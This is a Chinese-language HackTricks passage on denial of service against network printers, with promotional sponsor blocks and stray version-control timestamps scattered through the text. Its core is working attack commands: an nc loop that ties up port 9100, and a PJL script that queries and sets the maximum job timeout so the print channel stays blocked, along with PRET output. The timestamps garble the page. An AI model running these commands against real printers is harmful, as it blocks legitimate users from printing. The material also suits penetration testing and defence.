2022-04-28 16:01:33 +00:00
< details >
2024-01-08 12:07:15 +00:00
< summary > < strong > 从零到英雄学习AWS黑客技术, 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-08 12:07:15 +00:00
如果打印作业是串行处理的——这是大多数设备的假设——一次只能处理一个作业。如果这个作业没有有效地终止打印通道,就会被阻塞直到触发超时,阻止合法用户打印。
2020-07-15 15:43:14 +00:00
2024-01-08 12:07:15 +00:00
基本DoS:
2020-07-15 15:43:14 +00:00
```bash
while true; do nc printer 9100; done
```
2024-01-08 12:07:15 +00:00
这种简单的拒绝服务攻击可以通过**使用PJL设置高超时值**来改进,这样攻击者需要建立的连接数就减少了,而合法用户要获得空闲时间槽则更加困难:
2020-07-15 15:43:14 +00:00
```bash
# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
2023-08-03 19:12:22 +00:00
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
2020-07-15 15:43:14 +00:00
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
```
2024-01-08 12:07:15 +00:00
你可以使用 [PRET ](https://github.com/RUB-NDS/PRET ) 来查找超时设置:
2020-07-15 15:43:14 +00:00
```bash
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
2023-08-03 19:12:22 +00:00
5
300
2020-07-15 15:43:14 +00:00
```
2024-01-08 12:07:15 +00:00
```markdown
虽然PJL参考规定了最大超时时间为300秒, 但实际上最大PJL超时时间可能从15秒到2147483秒不等。
请注意, 只要连接保持开放, 即使是从其他打印通道( 如IPP或LPD) 接收的打印作业也不再被处理。
2020-07-15 15:43:14 +00:00
2024-01-08 12:07:15 +00:00
**了解更多关于此攻击的信息** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel** ](http://hacking-printers.net/wiki/index.php/Transmission\_channel )
2022-04-28 16:01:33 +00:00
< details >
2024-01-08 12:07:15 +00:00
< summary > < strong > 从零开始学习AWS黑客攻击直到成为专家, 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
* 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-08 12:07:15 +00:00
```